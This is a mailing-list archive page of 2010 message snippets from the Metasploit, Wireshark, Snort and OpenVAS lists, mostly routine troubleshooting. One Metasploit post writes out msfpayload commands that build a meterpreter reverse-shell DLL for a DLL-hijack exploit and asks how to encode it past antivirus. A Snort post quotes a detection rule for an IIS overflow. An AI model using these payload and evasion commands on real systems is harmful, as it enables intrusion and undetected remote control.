Perfect. I was after the "generate_stage" function.
Thanks,
Ty
Re: Dynamically Generated Final Stages
egypt (Sep 02)
If I understand you correctly, you can look at passivex for an example
of what you want. Basically you need to tell the framework that the
final stage is not transmitted over the stager connection as with
normal stagers. Then call generate_stage to get the final payload.
Hope this helped,
egypt
Re: Dynamically Generated Final Stages
tyronmiller (Sep 02)
Hey Philip,
Thanks for sending through the new link, as well as your response. I have
gone through the code and I don't think this was what I was after.
Appreciated anyway.
Let me see if I can be clearer in what I am after:
I have added my payload module called "awesome_payload" to my msf
installation. In msfconsole, when I type "search awesome_payload" I get the
following:
windows/dllinject/awesome_payload...
Re: middle stage listener and threads
Ty Miller (Sep 01)
Hey guys,
No one had any threads/shellcode experience?
Threads look like they would be cleaner on Windows; however, SK pointed me
to his phrack article talking about how to do Windows forking (
http://www.phrack.org/issues.html?id=7&issue=62). This refers to an article
by LSD which doesn't seem to be there anymore (
http://lsd-pl.net/windows_components.html) ... If anyone has this article,
then can you pass it on or point me in the right...
problem metasploit on iphone 3G
robert (Sep 01)
hello guys,
I have a problem with "show exploits" on my iphone!
The other commands, show payloads and show nops, work fine; the only problem is with show exploits!
What's the problem?
msf > show exploits
[-] Error while running command show: uninitialized constant Msf::Encoder::Type::SingleStaticBit
Call stack:
/usr/share/msf3/data/msfweb/vendor/rails/activesupport/lib/active_support/dependencies.rb:431:in `load_missing_constant'...
nullcon Goa dwitiya (2.0) Call For Papers
nullcon (Sep 01)
nullcon Dwitiya (2.0)
The Jugaad(hacking) Conference
nullcon is an initiative by null - The open security community.
Website:
http://nullcon.net
Calling all Jugaadus(hackers)
It's the time of the year when we welcome research done by the
community as paper submissions for nullcon.
So, sip your coffee, dust your debuggers, fire your tools, challenge
your grey cells and shoot us an email.
Tracks:
---------------
- Bakkar: 1 Hr Talks
-...
Re: Fwd: return values from railgun
Rob Fuller (Sep 01)
I forgot about the strict RFC compliance on this list and only replied to
you Josh, here is my reply since you referenced it:
// It really depends on the call you make and what the API call returns,
attempt your call, attaching it to a variable and see what it spits out.
Re: return values from railgun
Carlos Perez (Sep 01)
Here are the results of all message box types, just look in the returned hash for the key "return" and read the returned
value
creturn_val = client.railgun.user32.MessageBoxA(0,"Hello","world","MB_OKCANCEL")
=> {"GetLastError"=>0, "return"=>2}
=> 2
=> Fixnum
Values for all messagebox types:
# Abort
=> {"GetLastError"=>0, "return"=>3}
# Retry
=>...
Re: Fwd: return values from railgun
lazydj98 (Sep 01)
Sorry for the apparently blank message everyone
I had intended to say, if you're checking for success, I had asked a
similar question a few weeks ago, but not specific to railgun, and the
answer was, success if not exception thrown. However railgun might be
different since I'm guessing you're looking for the return codes from the
actual windows functions that get called? Either way, try what Mubix said,
altho you should be able to look...
Re: DLL name for webdav_dll_hijacker exploit
anil saini (Aug 31)
I have made a dll using *"./msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.1.1 LPORT=5050 D > /temp/rpawinet.dll"* . The dll is working
and giving me meterpreter shell.
But this dll is caught by almost all anti-virus. I tried encoding this using
./msfencode but then this stopped working.
i used "*./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1
LPORT=4433 R | ./msfencode -c 13 -e x86/shikata_ga_nai - t...
Re: Dynamically Generated Final Stages
Ty Miller (Aug 31)
thanks. I'll take a look and will let ya know.
Thx,
Ty
Fwd: return values from railgun
Joshua Smith (Aug 31)
return values from railgun
max (Aug 31)
Hi there list, i tried to use railgun in a meterpreter script. Works
fine so far for opening a msgboxa but how do i get the return values
back from the api calls?
greetings
max
Re: Host Analysis
exibar (Aug 31)
Although not open source, Mandiant has a couple offerings that will do
what you want. They also have quite a few free tools that will also
perform these functions.
check them out, you'll be happy :-)
Exibar
Quoting Abhijeet Hatekar <abhi.hatekar () gmail com>:
Re: Host Analysis
Abhijeet Hatekar (Aug 31)
I would like to do complete remote system analysis by scanning registry,
services, processes, handles, network ports, shadow copies, open files, live
memory details etc and look for potential threats like Viruses, Malwares,
Rootkits.
GMER, ICESword, Autoruns can be used for most of these things but i would
like to know if there is a single tool available for doing all such things.
Responder is one such tool, however i am looking for...
Wireshark — Discussion of the free and open source Wireshark network sniffer. No other sniffer (commercial or otherwise) comes close. This archive combines the Wireshark announcement, users, and developers mailing lists.
Need to decode SNMP OIDs
andre.noel (Sep 02)
Hello all,
I need to decode snmp OIDs in Wireshark, but when I activate it under Name resolution I receive this error message:
Stopped processing module SNMPv2-SMI due to error(s) to prevent potential crash in libsmi.
Module's conformance level: 1.
See details at: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=560325
Is there something I do wrong ?
I'm running Wireshark 1.4.0 on windows XP.
Regards....
buildbot failure in Wireshark (development) on OSX-10.5-PowerPC
buildbot-no-reply (Sep 02)
The Buildbot has detected a new failure of OSX-10.5-PowerPC on Wireshark (development).
Full details are available at:
http://buildbot.wireshark.org/trunk/builders/OSX-10.5-PowerPC/builds/955
Buildbot URL: http://buildbot.wireshark.org/trunk/
Buildslave for this Build: osx-10.5-ppc
Build Reason:
Build Source Stamp: 34043
Blamelist: etxrab
BUILD FAILED: failed failed slave lost
sincerely,
-The Buildbot
Re: VoIP calls GRAPH button gone. FLOW button shows SIP but not RTP or T.38
COHEN, HARVEY S (ATTLABS) (Sep 02)
At Anders' suggestion, I downloaded and installed
wireshark-win32-1.5.0-SVN-34038.exe from
http://www.wireshark.org/download/automated/win32/
T.38 and RTP now appear correctly in the ladder diagram.
Harvey S. Cohen
AT&T Labs, Middletown, NJ
Mobile +1-908-768-5833
Office +1-732-420-4099
-----Original Message-----
From: wireshark-users-bounces () wireshark org
[mailto:wireshark-users-bounces () wireshark org] On Behalf Of...
buildbot failure in Wireshark (development) on Ubuntu-10.04-x64
buildbot-no-reply (Sep 02)
The Buildbot has detected a new failure of Ubuntu-10.04-x64 on Wireshark (development).
Full details are available at:
http://buildbot.wireshark.org/trunk/builders/Ubuntu-10.04-x64/builds/470
Buildbot URL: http://buildbot.wireshark.org/trunk/
Buildslave for this Build: ubuntu-10.04-x64
Build Reason:
Build Source Stamp: 34041
Blamelist: etxrab
BUILD FAILED: failed run-randpkt
sincerely,
-The Buildbot
Re: VoIP calls GRAPH button gone. FLOW button shows SIP but not RTP or T.38
Keith French (Sep 02)
I have just raised this on bugzilla as bug 5172
-----Original Message-----
From: wireshark-users-bounces () wireshark org on behalf of Keith French
Sent: Thu 02/09/2010 10:37
To: Community support list for Wireshark
Subject: RE: [Wireshark-users] VoIP calls GRAPH button gone. FLOW button shows SIP but not RTP or T.38
I have a similar problem with 1.4.0 and the latest development release 1.5.0 SVN 34041. There are two identical H323
calls in...
Re: VoIP calls GRAPH button gone. FLOW button shows SIP but not RTP or T.38
Keith French (Sep 02)
I have a similar problem with 1.4.0 and the latest development release 1.5.0 SVN 34041. There are two identical H323
calls in my trace, the FLOW graphs work fine for both displaying the H225, H245 & RTP. However, on one call Prepare
Filter only shows the H225, but on the other call it shows H225, H245 & RTP.
I'll raise it on bugzilla & attach my trace.
Keith French.
-----Original Message-----
From: wireshark-users-bounces ()...
Re: library wireshark in ruby
Stephen Fisher (Sep 01)
This question comes up on a regular basis on this list. usually. There
is no documentation on using libwireshark's dissection API other than
the source code and developer's documentation. That library is not
designed with use outside Wireshark in mind, though it is possible as
long as GPL guidelines (under which it's licensed) are adhered to.
Re: Export to CSV
Bill Meier (Sep 01)
Jaap Keuter wrote:
I was mistaken: The problem does occur on Windows.
A similar (but not quite the same) issue exists for exporting psml files.
The "PSML structure" is written at the beginning of the file only for
the first file written. Any following psml exported files will not have
the structure.
(There's a "static gboolean structure_written = FALSE;" in
proto_tree_write_psml() ...).
I'll fix both of these...
Re: Export to CSV
Stig Bjørlykke (Sep 01)
I also found some issues exporting as PSML. The second time a PSML
file is saved it's missing the headers.
I'll fix both cases :)
Re: Export to CSV
Jaap Keuter (Sep 01)
Sent from my iPhone
Because... ? (don't have the code at hand right now)
Thanks,
Jaap
Re: Export to CSV
Bill Meier (Sep 01)
Stig Bjørlykke wrote:
The actual issue is that the header fields are output only if
the output includes the first packet (#1) of the capture (however the
packet range is selected and independent of filters, etc).
This bug occurs only on platforms other than Windows.
Re: VoIP calls GRAPH button gone. FLOW button shows SIP but not RTP or T.38
Anders Broman (Sep 01)
Hi,
Could you try it on a development build from http://www.wireshark.org/download/automated/
it might be related to http://anonsvn.wireshark.org/viewvc/viewvc.cgi?view=rev&revision=33525
Please let us know the result.
Regards
Anders
________________________________
From: wireshark-users-bounces () wireshark org [mailto:wireshark-users-bounces () wireshark org] On Behalf Of COHEN,
HARVEY S (ATTLABS)
Sent: den 31 augusti 2010 22:00
To:...
Re: Wireshark sniffer stop by itself
Bill Meier (Sep 01)
Bill Meier wrote:
Addendum:
Re:
>> ...., the sniffer didn't stop working
>> completely but only the capture stop.
Do you mean that the Wireshark GUI was still running and responding ?
If so: then I don't know what happened.
I would still try using Dumpcap by itself to see if the problem still
occurs.
How to decode FP over UDP?
wang . hongxia1 (Sep 01)
I am using Wireshark version 1.2.9. I have some FP packets in pcap
format. However I do not see FP protocol option in "decode as" list.
However Enabled protocols, shows FP protocols enabled which indicates
Wireshark supports fp. I fill "fp" in filters, I can not get no Packets
filtered. However, I see some packets over UDP transported from RNC.
Please tell me how can I decode packets as FP.
Those sample fp packets...
Re: Wireshark sniffer stop by itself
Bill Meier (Sep 01)
גוטליב טובים אסף wrote:
Please see: http://wiki.wireshark.org/KnownBugs/OutOfMemory
Wireshark accumulates "state" during a capture and thus will eventually
run out of memory during an extended capture.
It would be better to use Dumpcap if you want to do an extended capture.
Dumpcap just captures the data and writes it to a file.
(Dumpcap is the program used by Wireshark to capture data).
Snort — Everyone's favorite open source IDS, Snort. This archive combines the snort-announce, snort-devel, snort-users, and snort-sigs lists.
Re: snort 2.8.6.1/base/ barnyard2 unified2 classification_id
Lawrence R. Hughes, Sr. (Sep 02)
Hi Paul,
Thanks for your reply, going on your description:
paul> The classification id is "embedded" in the db already. Each active signature
paul> is registered with its class_id when it's read into snort during startup. When
paul> a signature triggers, its sig_name ties to all the other values.
I cleared my mysql.log, started barnyard2 then snort.
I checked the mysql.log and it did not show where barnyard did anything...
Re: snort 2.8.6.1/base/ barnyard2 unified2 classification_id
Paul Schmehl (Sep 02)
--On Thursday, September 02, 2010 14:35:42 -0400 "Lawrence R. Hughes, Sr."
<lhughes () safemedia com> wrote:
[snipped details]
The classification id is "embedded" in the db already. Each active signature
is registered with its class_id when it's read into snort during startup. When
a signature triggers, its sig_name ties to all the other values.
mysql> describe sig_class;...
Re: Does 'ttl' allow less-than-or-equal and greater-than-or-equal?
Joshua . Kinard (Sep 02)
Russ,
Awesome! Glad to be of assistance.
Cheers!,
--J
-----Original Message-----
From: Russ Combs [mailto:rcombs () sourcefire com]
Sent: Thursday, September 02, 2010 10:01 AM
To: Kinard, Joshua A
Cc: snort-devel () lists sourceforge net
Subject: Re: [Snort-devel] Does 'ttl' allow less-than-or-equal and
greater-than-or-equal?
Russ,
Thanks for the info! Should I contact someone at SF directly to
highlight...
Re: Performance Monitor Graphing Tool
Joel Esler (Sep 02)
I believe there is an archived copy on brvenik's code site on snort.org.
Sent from my iPhone
------------------------------------------------------------------------------
This SF.net Dev2Dev email is sponsored by:
Show off your parallel programming skills.
Enter the Intel(R) Threading Challenge 2010.
http://p.sf.net/sfu/intel-thread-sfd
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge...
Re: Performance Monitor Graphing Tool
JJ Cummings (Sep 02)
I'm building an updated one currently... See my blog post from yesterday here: http://global-security.blogspot.com
Comments/desires(for the tool) are all welcome. I'll likely be publishing some initial code shortly!
JJC
Sent from the iRoad
Re: Performance Monitor Graphing Tool
Eoin Miller (Sep 02)
On 9/2/2010 6:46 PM, Greg Lane wrote:
I just end up using GNUPlot + cron. I wrote up a quick blog on it if you
want to see some examples:
http://trojanedbinaries.com/blog/?p=24
-- Eoin
Performance Monitor Graphing Tool
Greg Lane (Sep 02)
Does anybody have a good location to obtain a good perfmonitor graph tool for
snort? Every link that I have tried doesn't seem to work and nothing is
available.
Greg Lane
IT Manager
Lane Enterprises
Email: greglane () laneconstinc com
Phone: (228)872-2414
snort 2.8.6.1/base/ barnyard2 unified2 classification_id
Lawrence R. Hughes, Sr. (Sep 02)
Hi,
I have noticed that snort populates the 32 bit field for the classification id in its unified2 output, but barnyard2
never inserts the classification id into the database?
Below is a snapshot from our mysql.log of all transactions between barnyard2 and mysql:
554 Query BEGIN
554 Query SELECT sig_id FROM signature WHERE sig_name = 'POLICY RDP attempted administrator connection request ' AND
sig_rev = 4 AND sig_sid = 4060 AND sig_gid = 1...
Snort 2.9.0 and Intel QuickAssist
Document Retention (Sep 02)
Hello,
What types of hardware devices are the Snort Community using that takes
advantage of the Intel QuickAssist feature added to Snort 2.9.0?
Thanks,
Doc
Re: Does 'ttl' allow less-than-or-equal and greater-than-or-equal?
Russ Combs (Sep 02)
A bug is open on this and the fix (including support for <= and >=) should
be out soon.
The manual was already fixed following your earlier email. Sorry you didn't
get a response then.
There is no public bug tracker (other than this list). But as these bugs
work their way through the system, additional steps are taken to ensure
related things are updated, including SF manuals.
Thanks for pointing out these issues.
Russ...
Rule 3:13476 direction?
Jefferson, Shawn (Sep 01)
Hi,
I'm looking at a few alerts from the so_rule 3:13476, but it looks like the direction is wrong...
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"WEB-MISC Microsoft IIS HTMLEncode Unicode string buffer
overflow"; sid:13476; gid:3; rev:2; classtype:web-application-attack; reference:cve,2008-0075;
reference:url,www.microsoft.com/technet/security/bulletin/ms08-006.mspx; metadata: engine shared, soid 3|13476;)
(and...
preprocessor ftp_telnet_protocol: FP on spaces
Castle, Shane (Sep 01)
The preprocessor ftp_telnet_protocol always FPs when there is a space in
(e.g.) the CWD command (or any other, for that matter). How do I stop
these alerts? The README.ftptelnet is of no help here. Reading the guide
PDF indicates that I might be able to override this with
cmd_validity CWD < string > (in the case of the CWD FP)
but this is not clear. I suppose I could try it...
Re: how to create testing data files??
Russ Combs (Aug 31)
If you really want to go from text strings straight into Snort, abcip (
http://sourceforge.net/projects/abcip/ ) now includes a DAQ and a raw input
mode, so you can do stuff like this:
Terminal:
snort --daq abc --daq-var raw -i tty
Redirect:
snort --daq abc --daq-var raw -i tty < test.txt
Readback:
snort --daq abc --daq-var raw -r test.txt
Russ
Re: A few questions regarding Solaris
Mike Lococo (Aug 31)
I add a userparameter to the zabbix_agentd.conf file as follows (ignore
linebreaks, it should all be on one line):
UserParameter=snort.perfmon[*],tail -n1 '/var/log/snort
/$1/snort.stats' | awk -F ',' '{print $ $2}'
This uses tail to grab the last line of a stats file, and pipes that
line into awk in order to print a particular column. $1 and $2 are
zabbix variables that allow you to create "items" that monitor different...
Re: A few questions regarding Solaris
Robert Riskin (Aug 31)
Mike thank you very much for the info, I'm curious how you have Zabbix watch
your perfmon file with certain columns. I use Zabbix in a separate
environment (and I love it) but am planning on deploying in production by
year-end.
Yeah I'm going to rebuild the system with a supported SO_RULES platform.
I was thinking about going for a sourcefire box but I really enjoy building
and learning this stuff from the ground up, it's very informative and...
OpenVAS — Development and announcements regarding OpenVAS, a free network security scanner which forked from Nessus. This is a combination of the English openvas-announce, openvas-devel, openvas-discuss, and openvas-plugins lists.
Re: Memory footprint for openvassd
Jan-Oliver Wagner (Sep 02)
thanks for starting to work on this.
There are many, many ways to optimize still left.
E.g. it is not really necessary to keep the description
in memory at all.
Unfortunately the code we inherited is not really helpful
to allow changes easily.
I planned to work on this in more detail after we have
the rest of the framework in place. Seems you are in
need of this earlier.
My actual idea to get the memory footprint low is
to have openvassd only...
Re: Memory footprint for openvassd
Thomas Reinke (Sep 02)
Jan-Oliver Wagner wrote:
Yes, we've noticed as we dig through the nvti* routines
and how the cache works. That being said, it's a bit
of an issue right now for us, and probably will be for
others later, if the daemon chooses to cache so much
information in memory as to make it impossible to run
any decent work load on the box. We can easily enough upgrade
memory on our boxes, but most of our platforms are
a bit older (as in a couple of years)...
Re: Memory footprint for openvassd
Jan-Oliver Wagner (Sep 02)
please have in mind that OpenVAS stores more meta
information about NVTs than Nessus does.
Re: Memory footprint for openvassd
Thomas Reinke (Sep 02)
Tim Brown wrote:
We're digging into it now. More nasl's doesn't really account
for the differential problem we're seeing between Nessus and
OpenVAS - since we're using the exact same test suite.
We've already added dump logic on the emalloc calls to see
what's going on, and that alone is showing a straight forward
45 Meg consumption by the time openvassd is ready to accept
connections (and that ignores the overhead of malloc itself,
which IIRC...
Re: Memory footprint for openvassd
Tim Brown (Sep 02)
Wow, that sounds pretty nuts. Some of it may be attributed to more NASLs
being loaded but even so, it sounds like something is broken somewhere. Any
chance of attaching something like valgrind to it to see if there are any
obvious areas of concern?
Tim
Re: Memory footprint for openvassd
Thomas Reinke (Sep 02)
Ok...have some additional information to add now -
it would seem that a raw start up of Nessus was consuming
approximately 20M. The same start-up on OpenVAS
consumes >100M. It also seems that the child processes
are constrained by the maximum size of that startup,
i.e. we never see the memory of an actual script
processing task exceed that memory usage.
The factor of 5 (approximately 4K memory consumption
per script in the test suite)...
Memory footprint for openvassd
Thomas Reinke (Sep 02)
Hi all,
We're using openvas scanning daemon 3.1 only (have our own
customized client for controlling scans), and we've noticed
that with the change from nessus to openvas, the memory footprint
has ballooned in a huge way.
Currently, the typical amount of memory being consumed by
processes is averaging around 40 Meg per process, but many
tasks running over 100Meg.
We've already throttled our scan utilization to one third
of what it used to be,...
Re: Manager can't update/rebuild DB: database table is locked
Matthew Mundell (Aug 27)
Perhaps there is an old Manager running that has the lock on the database?
Manager can't update/rebuild DB: database table is locked
LC W (Aug 27)
Hello all. I've built and installed openvas-libraries-3.1.2,
openvas-scanner-3.1.0, and openvas-manager-1.0.2 from source on
RHEL5.5. I created the "om" account/certs per the README, and started
openvassd on port 9391, then tried to do a rebuild of the manager
database by running "openvasmd --sport 9391 --rebuild --verbose". If
I watch the manager log, I see that it connects to the scanner, and
then a bunch of SQL...
Re: Can't use SMB credentials
Jean Mouric (Aug 27)
I'm not sure about that. I found out that my plugin folder had been
corrupted and smb authentication worked just fine when I restored it. As
for the password not showing in the logs, it may be intentional, since it
doesn't show when you do a get_config either.
2010/8/27 Lucyga Dierk <Dierk.Lucyga () cancom de>
Re: Can't use SMB credentials
Lucyga Dierk (Aug 27)
Hi,
This might be related to the (yet unsolved) problem I described in my mail on August 13.
Seems like SMB passwords are generally ignored.
Dierk Lucyga
Re: Can't use SMB credentials
Jean Mouric (Aug 26)
Well, my bad, I got it to work after all. It seems that my plugin folder was
corrupted: everything seems to be ok now. Thanks for the answers!
2010/8/26 Jean Mouric <j.mouric () gmail com>
Re: Can't use SMB credentials
Jean Mouric (Aug 26)
I'll consider it.
How could I miss this? I changed it, but it still doesn't work though.
As I said, the lsc_credential method doesn't work either for SMB, which is
also why I think the type error above isn't the source of the problem. Is
there any difference in the handling of SMB parameters by the manager
compared to SSH? Maybe I shouldn't specify this in clear text but a specific
format?
Re: Can't use SMB credentials
Matthew Mundell (Aug 26)
Doing a | xmlstarlet will probably be easier.
You could leave out the <name>, because the Manager will use the name in
the get_configs_response.
[...]
This should be of type password.
Note also that if the target has a credential associated with it, then the
Manager will also send those credentials. This could override the values
you sent here.
Re: Can't use SMB credentials
Jean Mouric (Aug 26)
Oh, I just realized I trimmed the slashes in my commands in my e-mail, they
actually look like:
omp -p 9391 -X "<create_target><name>my target</name><hosts>[my targets
here]</hosts></create_target>"
omp -p 9391 -X "<create_config><name>[my config name]</name><get_configs_
2010/8/26 Jean Mouric <j.mouric () gmail com>
We also maintain archives for these lists (some are currently inactive):
Read some old-school private security digests such as Zardoz at SecurityDigest.Org
We're always looking for great network security related lists to archive. To suggest one, mail Fyodor.